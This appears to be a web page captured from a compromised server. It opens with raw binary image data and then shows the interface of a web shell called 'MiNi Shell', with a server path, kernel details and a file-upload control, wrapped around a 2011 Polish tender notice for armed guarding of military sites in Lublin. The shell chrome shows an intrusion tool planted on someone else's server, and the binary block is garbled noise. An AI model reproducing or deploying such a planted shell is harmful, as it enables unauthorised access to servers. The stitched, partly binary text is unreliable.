JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20111206/320489-N-2011.html

<p class="kh_header"><b>Dęblin: Świadczenie usług w zakresie ochrony osób i mienia przez Specjalistyczną Uzbrojoną Formację Ochronną (SUFO) w  kompleksach będących na zaopatrzeniu pod względem ochrony Jednostki Wojskowej 4219 w Dęblinie, tj. Wojewódzkiego Sztabu Wojskowego  w Lublinie oraz Wojskowej Komendy Uzupełnień w Lublinie - 79/11/N</b><br>
<b>Numer ogłoszenia: 320489 - 2011; data zamieszczenia: 06.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 4219 , 08-521 Dęblin, woj. lubelskie, tel. 0-81 5519510, 5517818, faks 0-81 5519536.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.5wog.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług w zakresie ochrony osób i mienia przez Specjalistyczną Uzbrojoną Formację Ochronną (SUFO) w  kompleksach będących na zaopatrzeniu pod względem ochrony Jednostki Wojskowej 4219 w Dęblinie, tj. Wojewódzkiego Sztabu Wojskowego  w Lublinie oraz Wojskowej Komendy Uzupełnień w Lublinie - 79/11/N.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wykonywanie usługi ochrony fizycznej osób i mienia (KOD CPV 79710000-4) - świadczenie usług przez Specjalistyczną Uzbrojoną Formację Ochronną (SUFO) w zakresie ochrony osób i mienia w  kompleksach będących na zaopatrzeniu po względem ochrony Jednostki Wojskowej 4219 w Dęblinie, w układzie rzeczowym:
Bezpośrednia ochrona fizyczna kompleksów: 

1.1	Wojewódzkiego Sztabu Wojskowego w Lublinie, 
1.2	Wojskowej Komendy Uzupełnień w Lublinie.

2.	Bezpośrednia ochrona fizyczna Wojewódzkiego Sztabu Wojskowego w Lublinie
2.1 Przedmiot zamówienia dotyczy usługi w zakresie całodobowej ochrony budynku WSzW w Lublinie ul. Spadochroniarzy 5 wraz z terenem przyległym, przez Specjalistyczne Uzbrojone Formacje Ochronne (SUFO) Wykonawcy, posiadającego koncesję na prowadzenie działalności gospodarczej w zakresie ochrony osób i mienia, przy wykorzystaniu licencjonowanych pracowników ochrony I lub II stopnia, w okresie od 31.12.2011r. godz. 10.00 do 31.12.2012r. godz.10.00.
2.2 Ochrona w obiekcie Wojewódzkiego Sztabu Wojskowego w Lublinie polega na bezpośredniej ochronie fizycznej, stałym dozorze sygnałów przesyłanych, gromadzonych  i przetwarzanych w elektronicznych systemach i urządzeniach alarmowych, kontroli ruchu osobowego, prowadzeniu gospodarki kluczami użytku bieżącego, patrolowaniu i obserwacji strefy wokół obiektu, kontroli ruchu pojazdów wjeżdżających na parking przed WSzW.
2.3 Ochrona obiektu realizowana będzie:
1)	całodobowo - w systemie dwunastogodzinnym - jeden pracownik ochrony SUFO na zmianie dziennej (8.00-20.00) jeden pracownik na zmianie nocnej (20.00-8.00 dnia następnego) wykonujący równocześnie obowiązki dyżurnego lokalnego centrum nadzoru;
2)	doraźnie - przez załogę (grupę) interwencyjną co najmniej dwuosobową, wzywaną na dodatkowy sygnał przekazany przez uprawnione osoby z WSzW lub Wykonawcy.
3. Ochrona w obiekcie Wojskowej Komendy Uzupełnień w Lublinie

3.1 Przedmiot zamówienia dotyczy usługi w zakresie obsługi biura przepustek         w budynku Wojskowej Komendy Uzupełnień w Lublinie (WKU w Lublinie)                 i Wojewódzkiego Sztabu Wojskowego w Lublinie (WSzW w Lublinie),                     ul. Spadochroniarzy 5 w systemie 9 - cio godzinnym przez Specjalistyczne Uzbrojone Formacje Ochronne (SUFO) Wykonawcy, posiadającego aktualną koncesję MSWiA na prowadzenie działalności gospodarczej w zakresie ochrony osób i mienia, przy wykorzystaniu pracownika ochrony.
3.2 Ochrona w obiekcie WKU w Lublinie i WSzW w Lublinie, polega na obsłudze biura przepustek, tzn. bezpośredniej ochronie fizycznej, kontroli ruchu osobowego, wydawaniu i przyjmowaniu na przechowanie kluczy użytku bieżącego, obserwacji strefy przed obiektem i zapewnieniu dodatkowej ochrony związanej z wprowadzeniem stanów gotowości do podjęcia działań.
3.3 Ochrona obiektu realizowana będzie:
a)	w systemie 9 godzinnym - w dni robocze tygodnia od godz. 7.00 do 16.00 - obsługa biura przepustek - kontrola ruchu osobowego, wydawanie            i przyjmowanie obowiązujących przepustek interesantom (gościom), wydawanie i przyjmowanie na przechowanie kluczy użytku bieżącego, obserwacja strefy przed obiektem ze szczególnym uwzględnieniem parkingu przed budynkiem,
b)	doraźnie - przez załogę (grupę) interwencyjną co najmniej dwuosobową, wzywaną na dodatkowy sygnał przekazywany przez uprawnione osoby 
z WKU lub Wykonawcy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten spełnią wykonawcy posiadający: ważną koncesję wydaną przez Ministerstwo Spraw Wewnętrznych i Administracji na prowadzenie działalności         w zakresie usług ochrony mienia realizowanych w formie bezpośredniej ochrony fizycznej - stosownie do treści art. 18.1 ustawy z dnia 22 sierpnia 1997 r. - O ochronie osób i mienia (j.t. Dz. U. z 2005 r. Nr 145, poz. 1221 z późn. zm.).Ocena spełniania przez wykonawców w/w warunku dokonana będzie zgodnie z formułą spełnia - nie spełnia na podstawie treści złożonych dokumentów i oświadczeń określonych w części VI siwz.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten spełnią wykonawcy, którzy w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonali lub wykonują co najmniej 1 (jedną) usługę w zakresie ochrony fizycznej osób i mienia realizowaną przez Specjalistyczną Uzbrojoną Formację Ochronną. Wymagana wartość zrealizowanej usługi to co najmniej 100.000 zł brutto (wymagane jest podanie ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączenie dokumentu potwierdzającego, że te usługi zostały wykonane lub są wykonywane należycie).Ocena spełniania przez wykonawców w/w warunku dokonana będzie zgodnie z formułą spełnia - nie spełnia na podstawie treści złożonych dokumentów i oświadczeń określonych w części VI siwz.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten spełnią Wykonawcy, którzy złożą: 
 - wykaz broni palnej, środków przymusu bezpośredniego oraz sprzętu samochodowego niezbędnego do realizacji zamówienia zgodnie z wymaganiami Zamawiającego ( opisem przedmiotu zamówienia zawartym w siwz); 
- oświadczenie o posiadaniu własnej grupy interwencyjnej; 
- oświadczenie o wyposażeniu w broń palną bojową oraz w środki przymusu bezpośredniego
- oświadczenie o posiadaniu własnej grupy interwencyjnej; 

- oświadczenie  o wyrażeniu  zgody na realizację usługi ochronny fizycznej jednostki przez SUFO oraz wzmocnienie ochrony poprzez zorganizowanie dodatkowych posterunków po ogłoszeniu mobilizacji, wprowadzeniu stanu wojennego lub w czasie wojny na zasadach i w trybie określonym w Rozporządzeniu Rady Ministrów z dn. 24.11.2009 r. Dz.U. Nr 210, poz. 1612  (zgodnie z § 4 i § 5  Rozporządzenia MON  z 25.01.2006 r Dz.U. nr 19 poz. 147 i poz. 148),

Ocena spełniania przez wykonawców w/w warunku dokonana będzie zgodnie z formułą spełnia - nie spełnia na podstawie treści złożonych dokumentów i oświadczeń określonych w części VI siwz.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- oświadczenie o posiadaniu pełnomocnika ds. Ochrony Informacji Niejawnych (legitymującego się  poświadczeniem bezpieczeństwa uprawniającym do dostępu do informacji niejawnych o klauzuli co najmniej poufne, posiadającym aktualne zaświadczenie o przeszkoleniu w zakresie ochrony informacji niejawnych prowadzone przez żołnierzy lub funkcjonariuszy SKW lub ABW) i Pionu Ochrony w tym kancelarii - stosownie do treści art. 14 ustawy z dnia 5 sierpnia 2010 r. - O ochronie informacji niejawnych (Dz. U. z 2010 r. Nr 182, poz. 1228). 
Kierownik kancelarii powinien posiadać poświadczenie bezpieczeństwa o klauzuli minimum poufne oraz zaświadczenie stwierdzające odbycie szkolenia w zakresie ochrony informacji niejawnych, a także zaświadczenie o odbyciu szkolenia specjalistycznego dla kierowników kancelarii;
- oświadczenie o posiadaniu własnej grupy interwencyjnej; 

- oświadczenie  o wyrażeniu  zgody na realizację usługi ochronny fizycznej jednostki przez SUFO oraz wzmocnienie ochrony poprzez zorganizowanie dodatkowych posterunków po ogłoszeniu mobilizacji, wprowadzeniu stanu wojennego lub w czasie wojny na zasadach i w trybie określonym w Rozporządzeniu Rady Ministrów z dn. 24.11.2009 r. Dz.U. Nr 210, poz. 1612  (zgodnie z § 4 i § 5  Rozporządzenia MON z 25.01.2006 r Dz.U. nr 19 poz. 147 i poz. 148),
- wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia  niezbędnych do wykonania zamówienia zgodnie z opisem przedmiotu zamówienia zawartym w siwz, a także zakresu wykonywanych przez nich czynności,
- oświadczenie, że osoby, które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek poosiadania takich uprawnień
Ocena spełniania przez wykonawców w/w warunku dokonana będzie zgodnie z formułą spełnia - nie spełnia na podstawie treści złożonych dokumentów i oświadczeń określonych w części VI siwz.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten spełnią Wykonawcy, którzy przedstawią:
- opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ochrony osób i mienia na kwotę nie niższą niż 100.000,00 zł i będą posiadać takie ubezpieczenie przez cały okres obowiązywania umowy. W przypadku, gdy przedstawiona przez wykonawcę opłacona polisa traci ważność przed planowanym terminem realizacji zamówienia, wykonawca powinien przedłożyć wraz z ofertą oświadczenie o przedłużeniu polisy OC na cały okres trwania umowy w przypadku wyboru jego oferty jako najkorzystniejszej.
 W stosunku do wybranego wykonawcy - odpowiedzialność ta ma być rozszerzona  o szkody powstałe w mieniu chronionym. Powyższe elementy, cechy ubezpieczenia muszą być wpisane do treści polisy. Wybrany wykonawca zobowiązuje się przekazać niezwłocznie Zamawiającemu kserokopie nowej lub przedłużonej polisy.
Ocena spełniania przez wykonawców w/w warunku dokonana będzie zgodnie z formułą spełnia - nie spełnia na podstawie treści złożonych dokumentów i oświadczeń określonych w części VI siwz.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- oświadczenie o posiadaniu własnej grupy interwencyjnej - Załącznik Nr 7;
- oświadczenie  o wyrażeniu  zgody na realizację usługi ochronny fizycznej jednostki przez SUFO oraz wzmocnienie ochrony poprzez zorganizowanie dodatkowych posterunków po ogłoszeniu mobilizacji, wprowadzeniu stanu wojennego lub w czasie wojny na zasadach i w trybie określonym w Rozporządzeniu Rady Ministrów z dn. 24.11.2009 r. Dz.U. Nr 210, poz. 1612  (zgodnie z § 4 i § 5  Rozporządzenia MON   z 25.01.2006 r Dz.U. nr 19 poz. 147 i poz. 148),- Załącznik Nr 8;</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Wszelkie zmiany do umowy wymagają zgody obu stron wyrażonej w formie pisemnego aneksu, pod rygorem nieważności.
2. Przewiduje się możliwość zmiany zawartej umowy w przypadku:
1) Zmiana stawki  i kwoty podatku VAT oraz wynagrodzenia brutto określonego w § 5.
2) Zmniejszenie zakresu przedmiotu zamówienia, gdy jego wykonanie w pierwotnym zakresie nie leży w interesie Zamawiającego.
3) Zmniejszenie wynagrodzenia za wykonanie przedmiotu zamówienia w przypadku zmniejszenia zakresu przedmiotu zamówienia w przypadku określonym w pkt. 2).
4) Zmiana terminu realizacji przedmiotu zamówienia, w przypadku:
a) Gdy wykonanie zamówienia w określonym pierwotnym terminie nie leży w interesie Zamawiającego.
b) Działania siły wyższej, uniemożliwiającej wykonanie umowy w określonym pierwotnie terminie.
     5) Zmiany stanu osobowego Wykonawcy, który będzie uczestniczył w wykonaniu     zamówienia .
3. Zmiany umowy przewidziane w ust. 2 dopuszczalne są w następujących warunkach:
1) stawka i kwota podatku VAT oraz wynagrodzenie brutto ulegną zmianie odpowiednio do treści przepisów wprowadzających zmianę.
2) zmniejszenie zakresu przedmiotu umowy w granicach uzasadnionego interesu Zamawiającego.
3) W zakresie wynikającym ze zmian w planie finansowym Zamawiającego.
4) Wynagrodzenie za wykonanie przedmiotu zamówienia określone w § 5 zostanie zmniejszone proporcjonalnie do zmienionego zakresu zamówienia - wysokość ostatecznego, zmniejszonego wynagrodzenia zostanie ustalona na podstawie protokołu zatwierdzonego przez obie strony umowy, na podstawie wyliczenia procentowego udziału zmniejszonego zakresu zamówienia w pierwotnie przyjętym zakresie.
5) Zmiana terminu realizacji zamówienia:
a) o okres umożliwiający osiągnięcie określonego interesu Zamawiającego.
b) o okres działania siły wyższej oraz potrzeby do usunięcia jej działania.
6) Wykonawca zobowiązany jest w przypadku wymiany pracownika, aby nowo zaangażowany pracownik posiadał, co najmniej takie same kwalifikacje 
i uprawnienia. Wszelkie zmiany pracowników na stanowisku ochrony będą niezwłocznie dokumentowane i zgłaszane przez Wykonawcę na piśmie z załączeniem potwierdzonej za zgodność z oryginałem kserokopii dokumentów potwierdzających posiadane uprawnienia  i pozwolenia minimum 72 godziny przed objęciem służby.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.5wog.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa Nr 4219, Lotnisko budynek 205, pok.4, 08-521 Dęblin lub pocztą po wpłacie 17,00 zł na konto 15101013390000972231000000. Pisemną prośbę należy przesłać łącznie z dowodem wpłaty.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.12.2011 godzina 12:00, miejsce: Kancelaria Jawna (pok. nr 20) Jednostki Wojskowej Nr 4219, Lotnisko bud.205, 08-521 Dęblin.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com